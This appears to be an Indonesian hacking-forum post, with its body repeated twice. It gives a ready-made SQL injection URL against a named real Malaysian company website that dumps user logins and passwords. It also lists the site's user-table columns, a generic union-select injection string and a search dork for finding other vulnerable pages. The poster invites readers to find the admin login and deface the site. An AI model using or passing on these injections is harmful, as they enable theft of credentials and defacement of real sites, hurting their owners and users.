langsung aj dh..ane gk deface web itu cz susah cari admin login'a..wkwkwk
pass sama username'a disini
http://www.vicsonsb.com.my/news.php?id=2+and+1=2+union+select+1,2,group_concat(USR_LOGIN,0x3a,USR_PASSWORD)
,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user--
struktur tabelnya..
USR_LOGIN,USR_NAME,USR_PASSWORD,USR_EMAIL,USR_TYPE,USR_STATUS,
USR_CREATEID,USR_CREATEDTIME,
USR_LMID,USR_LMDTIME
exploit : +and+1=2+union+select+1,2,3,4,5,6,7--
Dork :inurl:news.php?id=
thank's...
klo udah dapet admin login kasih tw ane iy..hehehe
pass sama username'a disini
http://www.vicsonsb.com.my/news.php?id=2+and+1=2+union+select+1,2,group_concat(USR_LOGIN,0x3a,USR_PASSWORD)
,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user--
struktur tabelnya..
USR_LOGIN,USR_NAME,USR_PASSWORD,USR_EMAIL,USR_TYPE,USR_STATUS,
USR_CREATEID,USR_CREATEDTIME,
USR_LMID,USR_LMDTIME
exploit : +and+1=2+union+select+1,2,3,4,5,6,7--
Dork :inurl:news.php?id=
thank's...
klo udah dapet admin login kasih tw ane iy..hehehe